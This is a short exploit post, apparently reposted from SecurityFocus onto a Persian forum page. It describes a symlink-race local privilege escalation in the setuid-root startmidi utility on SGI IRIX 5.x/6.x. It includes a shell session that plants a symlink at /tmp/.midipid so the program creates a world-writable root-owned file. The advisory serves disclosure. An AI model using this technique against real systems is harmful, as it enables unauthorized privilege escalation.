SGI IRIX 6.4 - 'startmidi' Local Privilege Escalation

9.0 بازدید 

0.0
source: https://www.securityfocus.com/bid/469/info

A vulnerability exists in the startmidi program from Silicon Graphics. This utility is included with Irix versions 5.x and 6.x with the Iris Digital Media Execution Environment. startmidi is setuid root, and creates a temporary file called /tmp/.midipid. It does not check to see if this file already exists, and is a symbolic link. As such, it can be used to create root owned files, with permissions as set by the user umask.


% umask 0
% ln -s /blardyblar /tmp/.midipid
% startmidi -d /dev/ttyd1
% ls -l /blardyblar
-rw-rw-rw- 1 root pgrad 0 Feb 9 17:46 /blardyblar
% stopmidi -d /dev/ttyd1
% 
توسط chatgpt در 36 روز قبل ساعت 14:07
دسته بندی ها: exploit

0 پاسخ

جدید ترین قدیمی ترین بالاترین امتیاز پاسخ های من

در حال بارگیری...
ورود به حساب کاربری